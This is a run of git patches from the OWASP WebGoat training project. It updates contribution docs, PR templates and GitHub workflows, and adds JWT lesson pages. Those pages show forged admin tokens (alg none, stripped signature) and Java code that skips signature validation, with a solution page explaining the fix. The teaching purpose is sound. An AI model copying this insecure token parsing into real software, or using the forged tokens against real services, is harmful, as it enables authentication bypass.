+    origin git@github.com:<your Github handle>/WebGoat.git (fetch)
+    origin git@github.com:<your Github handle>/WebGoat.git (push)
+    upstream git@github.com:OWASP/WebGoat.git (fetch)
+    upstream git@github.com:OWASP/WebGoat.git (push)
+    ```
+
+    See also the GitHub documentation on "[Configuring a remote for a fork](https://docs.github.com/en/free-pro-team@latest/github/collaborating-with-issues-and-pull-requests/configuring-a-remote-for-a-fork "Configuring a remote for a fork")".
+5. Choose what to work on, based on any of the outstanding [issues](https://github.com/WebGoat/WebGoat/issues "WebGoat Issues").
+6. Create a branch so that you can cleanly work on the chosen issue: `git checkout -b FixingIssue66`
+7. Open your favorite editor and start making modifications. We recommend using the IntelliJ Idea <TODO : LINK HERE>.
+8. After your modifications are done, push them to your forked repository. This can be done by executing the command `git add MYFILE` for every file you have modified, followed by `git commit -m '<issue-number>:Your Commit Message'` to commit the modifications and `git push` to push your modifications to GitHub.
+9. Create a Pull Request (PR) by going to your fork, <https://github.com/Your_Github_Handle/owasp-mstg> and click on the "New Pull Request" button. The target branch should typically be the Master branch. When submitting a PR, be sure to follow the checklist that is provided in the PR template. The checklist itself will be filled out by the reviewer.
+10. Your PR will be reviewed and comments may be given. In order to process a comment, simply make modifications to the same branch as before and push them to your repository. GitHub will automatically detect these changes and add them to your existing PR.
+11. When starting on a new PR in the future, make sure to always keep your local repo up to date:
+
+    ```bash
+    $ git fetch upstream
+    $ git merge upstream/develop
+    ```
+
+    See also the following article for further explanation on "[How to Keep a Downstream git Repository Current with Upstream Repository Changes](https://medium.com/sweetmeat/how-to-keep-a-downstream-git-repository-current-with-upstream-repository-changes-10b76fad6d97 "How to Keep a Downstream git Repository Current with Upstream Repository Changes")".
+
+If at any time you want to work on a different issue, you can simply switch to a different branch, as explained in step 5.
+
+> Tip: Don't try to work on too many issues at once though, as it will be a lot more difficult to merge branches the longer they are open.
+
+## What not to do
+
+Although we greatly appreciate any and all contributions to the project, there are a few things that you should take into consideration:
+
+* The WebGoat project should not be used as a platform for advertisement of commercial tools, companies or individuals. Write-ups should be written with free and open-source tools in mind and commercial tools are typically not accepted, unless as a reference in the security tools section.
+* Unnecessary self-promotion of tools or blog posts is frowned upon. If you have a relation with on of the URLs or tools you are referencing, please state so in the PR so that we can verify that the reference is in line with the rest of the guide.
+
+Please be sure to take a careful look at our [Code of Conduct](https://github.com/WebGoat/WebGoat/blob/master/CODE_OF_CONDUCT.md "Code of Conduct") for all the details.
diff --git a/PULL_REQUEST_TEMPLATE.md b/PULL_REQUEST_TEMPLATE.md
new file mode 100644
index 000000000..e6a20b538
--- /dev/null
+++ b/PULL_REQUEST_TEMPLATE.md
@@ -0,0 +1,7 @@
+Thank you for submitting a Pull Request to the WebGoat. Please make sure that:
+
+- [ ] Status checks have passed (e.g. packaging, linting, testing are fine)
+- [ ] Commits are [signed off ](https://git-scm.com/docs/git-commit#Documentation/git-commit.txt--s)
+
+If your PR is related to an issue. Please end your PR test with the following line:
+This PR closes #< insert number here >.
\ No newline at end of file
diff --git a/README.MD b/README.MD
index e5a8e4eda..490520bde 100644
--- a/README.MD
+++ b/README.MD
@@ -30,6 +30,8 @@ first thing that all hackers claim.*
 
 # Installation instructions:
 
+For more details check [the Contribution guide](/CONTRIBUTING.md)
+
 ## 1. Run using Docker
 
 Every release is also published on [DockerHub](https://hub.docker.com/r/webgoat/goatandwolf).

From 38bae09f82e4f6b899226cf16ab3b986031cf08e Mon Sep 17 00:00:00 2001
From: Jeroen Willemsen <jwillemsen@xebia.com>
Date: Wed, 29 Sep 2021 14:32:01 +0200
Subject: [PATCH 021/227] First iteration of sign off testing

---
 .github/workflows/signoff_mr.yml | 47 ++++++++++++++++++++++++++++++++
 PULL_REQUEST_TEMPLATE.md         |  2 +-
 2 files changed, 48 insertions(+), 1 deletion(-)
 create mode 100644 .github/workflows/signoff_mr.yml

diff --git a/.github/workflows/signoff_mr.yml b/.github/workflows/signoff_mr.yml
new file mode 100644
index 000000000..6c5ea27d1
--- /dev/null
+++ b/.github/workflows/signoff_mr.yml
@@ -0,0 +1,47 @@
+on: issue_comment
+
+jobs:
+  build:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/github-script@0.3.0
+        if: github.event.action == 'created'
+        with:
+          github-token: ${{ secrets.GITHUB_TOKEN }}
+          script: |
+            const isValidSignOff = (
+              context.payload.action === 'created' &&
+              context.payload.issue.pull_request &&
+              context.payload.comment.user.id === context.payload.issue.user.id &&
+              context.payload.comment.body === '/signoff'
+            )
+            if (!isValidSignOff) return
+            const pr = await github.pulls.get({
+              ...context.repo,
+              pull_number: context.payload.issue.number
+            })
+            const commits = await github.pulls.listCommits({
+              ...context.repo,
+              pull_number: context.payload.issue.number
+            })
+            const baseCommit = await github.git.getCommit({
+              ...context.repo,
+              commit_sha: pr.data.head.sha
+            })
+            const tree = await github.git.getTree({
+              ...context.repo,
+              tree_sha: baseCommit.data.tree.sha
+            })
+            const commitLines = commits.data.map(item => `- ${item.sha.slice(0, 6)}: ${item.commit.message}`).join('\n')
+            const header = `I, @${context.payload.comment.user.login}, hereby signoff on these commits:`
+            const newCommit = await github.git.createCommit({
+              ...context.repo,
+              message: `${header}\n\n${commitLines}`,
+              tree: tree.data.sha,
+              parents: [pr.data.head.sha]
+            })
+            await github.git.updateRef({
+              ...context.repo,
+              ref: `heads/${pr.data.head.ref}`,
+              sha: newCommit.data.sha
+            })
\ No newline at end of file
diff --git a/PULL_REQUEST_TEMPLATE.md b/PULL_REQUEST_TEMPLATE.md
index e6a20b538..de0ed0006 100644
--- a/PULL_REQUEST_TEMPLATE.md
+++ b/PULL_REQUEST_TEMPLATE.md
@@ -1,7 +1,7 @@
 Thank you for submitting a Pull Request to the WebGoat. Please make sure that:
 
 - [ ] Status checks have passed (e.g. packaging, linting, testing are fine)
-- [ ] Commits are [signed off ](https://git-scm.com/docs/git-commit#Documentation/git-commit.txt--s)
+- [ ] Commits are [signed off ](https://git-scm.com/docs/git-commit#Documentation/git-commit.txt--s) or [`/signoff` is provided as a comment](https://github.com/JasonEtco/signoff-commit-action).
 
 If your PR is related to an issue. Please end your PR test with the following line:
 This PR closes #< insert number here >.
\ No newline at end of file

From ae87f7eb493744e0d8845011b089ca3e0aeccccc Mon Sep 17 00:00:00 2001
From: Jeroen Willemsen <jwillemsen@xebia.com>
Date: Wed, 29 Sep 2021 14:39:45 +0200
Subject: [PATCH 022/227] Updated contributing

---
 CONTRIBUTING.md | 25 +++++--------------------
 1 file changed, 5 insertions(+), 20 deletions(-)

diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
index 528b51dd9..633a3cfdc 100644
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -1,7 +1,7 @@
 # Contributing
 ![GitHub contributors](https://img.shields.io/github/contributors/WebGoat/WebGoat.svg)](https://github.com/WebGoat/WebGoat/graphs/contributors)
-![GitHub issues by-label "help wanted"](https://img.shields.io/github/issues/bkimminich/juice-shop/help%20wanted.svg)
-![GitHub issues by-label "good first issue"](https://img.shields.io/github/issues/bkimminich/juice-shop/good%20first%20issue.svg)
+![GitHub issues by-label "help wanted"](https://img.shields.io/github/issues/WebGoat/WebGoat/help%20wanted.svg)
+![GitHub issues by-label "good first issue"](https://img.shields.io/github/issues/WebGoat/WebGoat/good%20first%20issue.svg)
 
 This document describes how you can contribute to WebGoat. Please read it carefully.
 
@@ -16,7 +16,7 @@ This document describes how you can contribute to WebGoat. Please read it carefu
 There are a couple of ways on how you can contribute to the project:
 
 * **File [issues](https://github.com/WebGoat/WebGoat/issues "Webgoat Issues")** for missing content or errors. Explain what you think is missing and give a suggestion as to where it could be added.
-* **Create a [Pull Request (PR)](https://github.com/WebGoat/WebGoat/pulls "Create a pull request")**. This is a direct contribution to the project and may be merged after review. You should ideally [create an issue](https://github.com/OWASP/owasp-mstg/issues "MSTG Issues") for any PR you would like to submit, as we can first review the merit of the PR and avoid any unnecessary work. This is of course not needed for small modifications such as correcting typos.
+* **Create a [Pull Request (PR)](https://github.com/WebGoat/WebGoat/pulls "Create a pull request")**. This is a direct contribution to the project and may be merged after review. You should ideally [create an issue](https://github.com/WebGoat/WebGoat/issues "WebGoat Issues") for any PR you would like to submit, as we can first review the merit of the PR and avoid any unnecessary work. This is of course not needed for small modifications such as correcting typos.
 * **Help out financially** by donating via [OWASP donations](https://owasp.org/donate/?reponame=www-project-webgoat&title=OWASP+WebGoat).
 
 ## How to get your PR Accepted
@@ -28,7 +28,7 @@ The minimum requirements for code contributions are:
 2. All new and changed code _should_ have a corresponding unit and/or integration test.
 3. New and changed lessons _must_ have a corresponding integration test.
 4. [Status checks](https://docs.github.com/en/github/collaborating-with-pull-requests/collaborating-on-repositories-with-code-quality-features/about-status-checks) should pass for your last commit.
-5. All Git commits within a PR _must_ be [signed off](https://git-scm.com/docs/git-commit#Documentation/git-commit.txt--s) to indicate the contributor's agreement with the [Developer Certificate of Origin](https://developercertificate.org/).
+5. All Git commits within a PR _must_ be [signed off](https://git-scm.com/docs/git-commit#Documentation/git-commit.txt--s) or [`/signoff` is provided as a comment](https://github.com/JasonEtco/signoff-commit-action) to indicate the contributor's agreement with the [Developer Certificate of Origin](https://developercertificate.org/).
 
 Additionally, the following guidelines can help:
 
@@ -39,21 +39,6 @@ Pull requests should be as small/atomic as possible. Large, wide-sweeping change
 * If you are making spelling corrections in the docs, don't modify other files.
 * If you are adding new functions don't '*cleanup*' unrelated functions. That cleanup belongs in another pull request.
 
-#### Squash your commits to a single commit
-
-To keep the history of the project clean, you should make one commit per pull request.
-If you already have multiple commits, you can add the commits together (squash them) with the following commands in Git Bash:
-
-1. Open `Git Bash` (or `Git Shell`)
-2. Enter following command to squash the recent {N} commits: `git reset --soft HEAD~{N} && git commit` (replace `{N}` with the number of commits you want to squash)
-3. Press <kbd>i</kbd> to get into Insert-mode
-4. Enter the commit message of the new commit
-5. After adding the message, press <kbd>ESC</kbd> to get out of the Insert-mode
-6. Write `:wq` and press <kbd>Enter</kbd> to save the new message or write `:q!` to discard your changes
-7. Enter `git push --force` to push the new commit to the remote repository
-
-For example, if you want to squash the last 5 commits, use `git reset --soft HEAD~5 && git commit`
-
 ### Don't mix code changes with whitespace cleanup
 
 If you change two lines of code and correct 200 lines of whitespace issues in a file the diff on that pull request is functionally unreadable and will be **rejected**. Whitespace cleanups need to be in their own pull request.
@@ -101,7 +86,7 @@ Furthermore, the pixel shortage is over. We want to see:
 6. Create a branch so that you can cleanly work on the chosen issue: `git checkout -b FixingIssue66`
 7. Open your favorite editor and start making modifications. We recommend using the IntelliJ Idea <TODO : LINK HERE>.
 8. After your modifications are done, push them to your forked repository. This can be done by executing the command `git add MYFILE` for every file you have modified, followed by `git commit -m '<issue-number>:Your Commit Message'` to commit the modifications and `git push` to push your modifications to GitHub.
-9. Create a Pull Request (PR) by going to your fork, <https://github.com/Your_Github_Handle/owasp-mstg> and click on the "New Pull Request" button. The target branch should typically be the Master branch. When submitting a PR, be sure to follow the checklist that is provided in the PR template. The checklist itself will be filled out by the reviewer.
+9. Create a Pull Request (PR) by going to your fork, <https://github.com/Your_Github_Handle/WebGoat> and click on the "New Pull Request" button. The target branch should typically be the Master branch. When submitting a PR, be sure to follow the checklist that is provided in the PR template. The checklist itself will be filled out by the reviewer.
 10. Your PR will be reviewed and comments may be given. In order to process a comment, simply make modifications to the same branch as before and push them to your repository. GitHub will automatically detect these changes and add them to your existing PR.
 11. When starting on a new PR in the future, make sure to always keep your local repo up to date:
 

From 93265a3686d43d99613ab81b2a20907c4e9abdca Mon Sep 17 00:00:00 2001
From: Jeroen Willemsen <jwillemsen@xebia.com>
Date: Wed, 29 Sep 2021 14:40:22 +0200
Subject: [PATCH 023/227] Fix pr template

---
 PULL_REQUEST_TEMPLATE.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/PULL_REQUEST_TEMPLATE.md b/PULL_REQUEST_TEMPLATE.md
index de0ed0006..d700f586f 100644
--- a/PULL_REQUEST_TEMPLATE.md
+++ b/PULL_REQUEST_TEMPLATE.md
@@ -1,7 +1,7 @@
 Thank you for submitting a Pull Request to the WebGoat. Please make sure that:
 
 - [ ] Status checks have passed (e.g. packaging, linting, testing are fine)
-- [ ] Commits are [signed off ](https://git-scm.com/docs/git-commit#Documentation/git-commit.txt--s) or [`/signoff` is provided as a comment](https://github.com/JasonEtco/signoff-commit-action).
+- [ ] Commits are [signed off](https://git-scm.com/docs/git-commit#Documentation/git-commit.txt--s) or [`/signoff` is provided as a comment](https://github.com/JasonEtco/signoff-commit-action).
 
 If your PR is related to an issue. Please end your PR test with the following line:
 This PR closes #< insert number here >.
\ No newline at end of file

From 68a69e9b07d029367f13ffc68e2511dea5e1f90e Mon Sep 17 00:00:00 2001
From: Jeroen Willemsen <jwillemsen@xebia.com>
Date: Wed, 29 Sep 2021 14:43:51 +0200
Subject: [PATCH 024/227] Updated stale to only have those that require input
 from a user

---
 .github/stale.yml | 12 ++++--------
 1 file changed, 4 insertions(+), 8 deletions(-)

diff --git a/.github/stale.yml b/.github/stale.yml
index 814750195..619a771a4 100644
--- a/.github/stale.yml
+++ b/.github/stale.yml
@@ -1,14 +1,10 @@
 ---
 daysUntilStale: 90
 daysUntilClose: 14
-exemptLabels:
-  - bounty
-  - challenge
-  - critical
-  - feature
-  - technical debt
+onlyLabels:
+  - waiting-for-input
+  - wontfix
 staleLabel: stale
 markComment: >
-  This issue has been automatically marked as `stale` because it has not had
-  recent activity. :calendar: It will be _closed automatically_ in one week if no further activity occurs.
+  This issue has been automatically marked as `stale` because it has not had recent activity. :calendar: It will be _closed automatically_ in one week if no further activity occurs.
 closeComment: false
\ No newline at end of file

From ef4b7ce1a74c8ef98ce141b997122cc55938d386 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Wed, 29 Sep 2021 15:16:03 +0200
Subject: [PATCH 025/227] Fix link to signoff commits

---
 PULL_REQUEST_TEMPLATE.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/PULL_REQUEST_TEMPLATE.md b/PULL_REQUEST_TEMPLATE.md
index d700f586f..607332f3d 100644
--- a/PULL_REQUEST_TEMPLATE.md
+++ b/PULL_REQUEST_TEMPLATE.md
@@ -1,7 +1,7 @@
 Thank you for submitting a Pull Request to the WebGoat. Please make sure that:
 
 - [ ] Status checks have passed (e.g. packaging, linting, testing are fine)
-- [ ] Commits are [signed off](https://git-scm.com/docs/git-commit#Documentation/git-commit.txt--s) or [`/signoff` is provided as a comment](https://github.com/JasonEtco/signoff-commit-action).
+- [ ] Commits are [signed off](https://git-scm.com/docs/git-commit#Documentation/git-commit.txt--s) or you type `/signoff` [is provided as a comment](https://github.com/JasonEtco/signoff-commit-action).
 
 If your PR is related to an issue. Please end your PR test with the following line:
 This PR closes #< insert number here >.
\ No newline at end of file

From 14a6efedf3e5e91fc67284c0e3790a92f2a98485 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Wed, 29 Sep 2021 13:42:52 +0200
Subject: [PATCH 026/227] Add extra documentation for using the correct
 algorithm but removing the signature.

---
 .../java/org/owasp/webgoat/JWTLessonTest.java |  2 +-
 .../java/org/owasp/webgoat/jwt/JWTQuiz.java   |  2 +-
 .../jwt/src/main/resources/html/JWT.html      | 12 +++++
 .../en/JWT_libraries_assignment.adoc          | 18 +++++++-
 .../en/JWT_libraries_assignment2.adoc         | 37 +++++++++++++++
 .../en/JWT_libraries_solution.adoc            | 46 +++++++++++++++++++
 6 files changed, 114 insertions(+), 3 deletions(-)
 create mode 100644 webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_libraries_assignment2.adoc
 create mode 100644 webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_libraries_solution.adoc

diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/JWTLessonTest.java b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/JWTLessonTest.java
index 4a6513440..8913e4351 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/JWTLessonTest.java
+++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/JWTLessonTest.java
@@ -210,7 +210,7 @@ public class JWTLessonTest extends IntegrationTest {
 	private void quiz() { 
 		Map<String, Object> params = new HashMap<>();
 		params.put("question_0_solution", "Solution 1");
-		params.put("question_1_solution", "Solution 3");
+		params.put("question_1_solution", "Solution 2");
 
 		checkAssignment(url("/WebGoat/JWT/quiz"), params, true);
 	}
diff --git a/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWTQuiz.java b/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWTQuiz.java
index 256e4be2e..0eebc255b 100644
--- a/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWTQuiz.java
+++ b/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWTQuiz.java
@@ -12,7 +12,7 @@ import org.springframework.web.bind.annotation.RestController;
 @RestController
 public class JWTQuiz extends AssignmentEndpoint {
 
-    private final String[] solutions = {"Solution 1", "Solution 3"};
+    private final String[] solutions = {"Solution 1", "Solution 2"};
     private final boolean[] guesses = new boolean[solutions.length];
 
     @PostMapping("/JWT/quiz")
diff --git a/webgoat-lessons/jwt/src/main/resources/html/JWT.html b/webgoat-lessons/jwt/src/main/resources/html/JWT.html
index d5cb0aad8..20097ca15 100644
--- a/webgoat-lessons/jwt/src/main/resources/html/JWT.html
+++ b/webgoat-lessons/jwt/src/main/resources/html/JWT.html
@@ -132,6 +132,18 @@
     </div>
 </div>
 
+<div class="lesson-page-wrapper">
+    <div class="lesson-page-solution">
+        <div class="adoc-content" th:replace="doc:JWT_libraries_assignment2.adoc"></div>
+    </div>
+</div>
+
+<div class="lesson-page-wrapper">
+    <div class="lesson-page-solution">
+        <div class="adoc-content" th:replace="doc:JWT_libraries_solution.adoc"></div>
+    </div>
+</div>
+
 <div class="lesson-page-wrapper">
     <div class="adoc-content" th:replace="doc:JWT_weak_keys"></div>
     <script th:src="@{/lesson_js/jwt-weak-keys.js}" language="JavaScript"></script>
diff --git a/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_libraries_assignment.adoc b/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_libraries_assignment.adoc
index 1937f084e..33e6418f6 100644
--- a/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_libraries_assignment.adoc
+++ b/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_libraries_assignment.adoc
@@ -7,6 +7,22 @@ Now let's look at a code review and try to think on an attack with the `alg: non
 eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwidXNlciI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0.
 ----
 
+which after decoding becomes:
+
+[source]
+----
+{
+  "alg" : "none",
+  "typ" : "JWT"
+},
+{
+  "admin" : true,
+  "iat" : 1516239022,
+  "sub" : "1234567890",
+  "user" : "John Doe"
+}
+----
+
 [source%linenums, java]
 ----
 try {
@@ -30,7 +46,7 @@ try {
    Jwt jwt = Jwts.parser().setSigningKey(JWT_PASSWORD).parse(accessToken);
    Claims claims = (Claims) jwt.getBody();
    String user = (String) claims.get("user");
-   boolean isAdmin = Boolean.valueOf((String) claims.get("admin"));
+   booelean isAdmin = Boolean.valueOf((String) claims.get("admin"));
    if (isAdmin) {
      removeAllUsers();
    } else {
diff --git a/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_libraries_assignment2.adoc b/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_libraries_assignment2.adoc
new file mode 100644
index 000000000..e1aa7c11c
--- /dev/null
+++ b/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_libraries_assignment2.adoc
@@ -0,0 +1,37 @@
+== Code review (2)
+
+Same as before but now we are only removing the signature part, leaving the algorithm as is.
+
+[source]
+----
+eyJhbGciOiJIUzI1NiJ9.ew0KICAiYWRtaW4iIDogdHJ1ZSwNCiAgImlhdCIgOiAxNTE2MjM5MDIyLA0KICAic3ViIiA6ICIxMjM0NTY3ODkwIiwNCiAgInVzZXIiIDogIkpvaG4gRG9lIg0KfQ.
+
+{
+  "alg" : "HS256"
+},
+{
+  "admin" : true,
+  "iat" : 1516239022,
+  "sub" : "1234567890",
+  "user" : "John Doe"
+}
+----
+
+Using the following `parse` method we are still able to skip the signature check.
+
+[source%linenums, java]
+----
+try {
+   Jwt jwt = Jwts.parser().setSigningKey(JWT_PASSWORD).parse(accessToken);
+   Claims claims = (Claims) jwt.getBody();
+   String user = (String) claims.get("user");
+   boolean isAdmin = Boolean.valueOf((String) claims.get("admin"));
+   if (isAdmin) {
+     removeAllUsers();
+   } else {
+     log.error("You are not an admin user");
+   }
+} catch (JwtException e) {
+  throw new InvalidTokenException(e);
+}
+----
diff --git a/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_libraries_solution.adoc b/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_libraries_solution.adoc
new file mode 100644
index 000000000..f01c33afc
--- /dev/null
+++ b/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_libraries_solution.adoc
@@ -0,0 +1,46 @@
+=== Solution
+
+In the past assignments we learned to **NOT** trust the libraries to do the correct thing for us. In both cases we saw that even specifying the JWT key and passing the correct algorithm. Even using the token:
+
+[source]
+----
+eyJhbGciOiJIUzI1NiJ9.ew0KICAiYWRtaW4iIDogdHJ1ZSwNCiAgImlhdCIgOiAxNTE2MjM5MDIyLA0KICAic3ViIiA6ICIxMjM0NTY3ODkwIiwNCiAgInVzZXIiIDogIkpvaG4gRG9lIg0KfQ.
+
+{
+  "alg" : "HS256"
+},
+{
+  "admin" : true,
+  "iat" : 1516239022,
+  "sub" : "1234567890",
+  "user" : "John Doe"
+}
+----
+
+And the following Java code:
+
+[source]
+----
+Jwt jwt = Jwts.parser().setSigningKey(JWT_PASSWORD).parse(accessToken);
+----
+
+You see we set the signing key with `setSigningKey` the library still skips the validation of the signature.
+
+It is not only limited to the traditional `alg: none` attack, but it also works with the `alg: HS256`.
+
+=== Conclusion
+
+When you have chosen a library to help dealing with JWT tokens make sure to:
+
+- use the correct method in your code when validating tokens.
+- add test cases and validate the algorithm confusion is not possible.
+- as a security team write a utility methods to be used by the teams which encapsulate the library to make sure the teams use the correct parsing logic.
+
+=== Alternative: Paseto
+
+The algorithm confusion is a real problem when dealing with JWTs it can be avoided by using PASETO (**P**latform-**A**gnostic **SE**curity **TO**kens), which is currently implemented in 10 programming languages.
+One of the drawbacks of using this method is that JWT is widely spread for example think about using OAuth, so it might not be the best solution to use.
+
+For more information take a look at the following video:
+
+video::RijGNytjbOI[youtube, height=480, width=100%]
\ No newline at end of file

From efca784acfeba593426ef1fe6da99988e98ec59f Mon Sep 17 00:00:00 2001
From: Jeroen Willemsen <jwillemsen@xebia.com>
Date: Wed, 29 Sep 2021 15:24:39 +0200
Subject: [PATCH 027/227] Update sign off command

Signed-off-by: Jeroen Willemsen <jwillemsen@xebia.com>
---
 CONTRIBUTING.md          | 4 ++--
 PULL_REQUEST_TEMPLATE.md | 2 +-
 2 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
index 633a3cfdc..e87d63fd6 100644
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -1,5 +1,5 @@
 # Contributing
-![GitHub contributors](https://img.shields.io/github/contributors/WebGoat/WebGoat.svg)](https://github.com/WebGoat/WebGoat/graphs/contributors)
+[![GitHub contributors](https://img.shields.io/github/contributors/WebGoat/WebGoat.svg)](https://github.com/WebGoat/WebGoat/graphs/contributors)
 ![GitHub issues by-label "help wanted"](https://img.shields.io/github/issues/WebGoat/WebGoat/help%20wanted.svg)
 ![GitHub issues by-label "good first issue"](https://img.shields.io/github/issues/WebGoat/WebGoat/good%20first%20issue.svg)
 
@@ -28,7 +28,7 @@ The minimum requirements for code contributions are:
 2. All new and changed code _should_ have a corresponding unit and/or integration test.
 3. New and changed lessons _must_ have a corresponding integration test.
 4. [Status checks](https://docs.github.com/en/github/collaborating-with-pull-requests/collaborating-on-repositories-with-code-quality-features/about-status-checks) should pass for your last commit.
-5. All Git commits within a PR _must_ be [signed off](https://git-scm.com/docs/git-commit#Documentation/git-commit.txt--s) or [`/signoff` is provided as a comment](https://github.com/JasonEtco/signoff-commit-action) to indicate the contributor's agreement with the [Developer Certificate of Origin](https://developercertificate.org/).
+5. All Git commits within a PR _must_ be [signed off](https://git-scm.com/docs/git-commit#Documentation/git-commit.txt--s) or [`/signoff` is provided as a comment](https://github.com/JasonEtco/signoff-commit-action) to indicate the contributor's agreement with the [Developer Certificate of Origin](https://developercertificate.org/). Alternatively you commit one signoff commit at the end of your commits by means of `git commit -m "Sign off" --amend --signof`.
 
 Additionally, the following guidelines can help:
 
diff --git a/PULL_REQUEST_TEMPLATE.md b/PULL_REQUEST_TEMPLATE.md
index 607332f3d..0f4d52c1a 100644
--- a/PULL_REQUEST_TEMPLATE.md
+++ b/PULL_REQUEST_TEMPLATE.md
@@ -1,7 +1,7 @@
 Thank you for submitting a Pull Request to the WebGoat. Please make sure that:
 
 - [ ] Status checks have passed (e.g. packaging, linting, testing are fine)
-- [ ] Commits are [signed off](https://git-scm.com/docs/git-commit#Documentation/git-commit.txt--s) or you type `/signoff` [is provided as a comment](https://github.com/JasonEtco/signoff-commit-action).
+- [ ] Commits are [signed off](https://git-scm.com/docs/git-commit#Documentation/git-commit.txt--s) or you have a commit which you amend with `git commit -m "Sign off" --amend --signof`. See [Contributing.md](https://github.com/WebGoat/WebGoat/blob/develop/CONTRIBUTING.md) for more details.
 
 If your PR is related to an issue. Please end your PR test with the following line:
 This PR closes #< insert number here >.
\ No newline at end of file

From 49109154a853952a476645814a1b23204a782874 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Wed, 29 Sep 2021 18:12:22 +0200
Subject: [PATCH 028/227] Add action to warn against PR against master (should
 be develop)

---
 .github/workflows/master_branch_pr.yml | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)
 create mode 100644 .github/workflows/master_branch_pr.yml

diff --git a/.github/workflows/master_branch_pr.yml b/.github/workflows/master_branch_pr.yml
new file mode 100644
index 000000000..5b6cc4e46
--- /dev/null
+++ b/.github/workflows/master_branch_pr.yml
@@ -0,0 +1,18 @@
+on:
+  pull_request:
+    branches: [master]
+
+jobs:
+  test:
+    runs-on: ubuntu-latest
+    steps:
+      - name: Post PR comment
+        if: failure()
+        uses: mshick/add-pr-comment@v1
+        with:
+          message: |
+            Hi @${{ github.event.pull_request.user.login }},
+
+            It looks like this pull request has been made against the ${{github.event.pull_request.head.repo.full_name}} `master` branch.
+            Since we use Git Flow all commits to master are through are from the develop branch.
+            You do not need to close this PR, you can change the target branch to `development` by clicking the _"Edit"_ button at the top of this page.
\ No newline at end of file

From 246b4de1b84512d7adcd0a9428f54a1d76aeec3e Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Wed, 29 Sep 2021 18:20:08 +0200
Subject: [PATCH 029/227] Add action to warn against PR against master (should
 be develop)

---
 .github/workflows/master_branch_pr.yml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.github/workflows/master_branch_pr.yml b/.github/workflows/master_branch_pr.yml
index 5b6cc4e46..65bbc6a5f 100644
--- a/.github/workflows/master_branch_pr.yml
+++ b/.github/workflows/master_branch_pr.yml
@@ -1,5 +1,6 @@
 on:
   pull_request:
+  pull_request_target:
     branches: [master]
 
 jobs:

From 835104c88f9d84be6dec67bed9a0b6281f76f1e5 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Wed, 29 Sep 2021 18:21:33 +0200
Subject: [PATCH 030/227] Add action to warn against PR against master (should
 be develop)

---
 .github/workflows/master_branch_pr.yml | 2 --
 1 file changed, 2 deletions(-)

diff --git a/.github/workflows/master_branch_pr.yml b/.github/workflows/master_branch_pr.yml
index 65bbc6a5f..4c1c52d79 100644
--- a/.github/workflows/master_branch_pr.yml
+++ b/.github/workflows/master_branch_pr.yml
@@ -1,6 +1,5 @@
 on:
   pull_request:
-  pull_request_target:
     branches: [master]
 
 jobs:
@@ -8,7 +7,6 @@ jobs:
     runs-on: ubuntu-latest
     steps:
       - name: Post PR comment
-        if: failure()
         uses: mshick/add-pr-comment@v1
         with:
           message: |

From b7ff89243ac93ee04767cb83f2e33c89a9028251 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Wed, 29 Sep 2021 18:23:11 +0200
Subject: [PATCH 031/227] Add action to warn against PR against master (should
 be develop)

---
 .github/workflows/master_branch_pr.yml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.github/workflows/master_branch_pr.yml b/.github/workflows/master_branch_pr.yml
index 4c1c52d79..fdf1af939 100644
--- a/.github/workflows/master_branch_pr.yml
+++ b/.github/workflows/master_branch_pr.yml
@@ -1,5 +1,6 @@
 on:
   pull_request:
+  pull_request_target:
     branches: [master]
 
 jobs:

From 5933d226af9353f8c92f4afd7598583ffefbd879 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Wed, 29 Sep 2021 18:31:19 +0200
Subject: [PATCH 032/227] Add action to warn against PR against master (should
 be develop)

---
 .github/workflows/master_branch_pr.yml | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/.github/workflows/master_branch_pr.yml b/.github/workflows/master_branch_pr.yml
index fdf1af939..8f782c385 100644
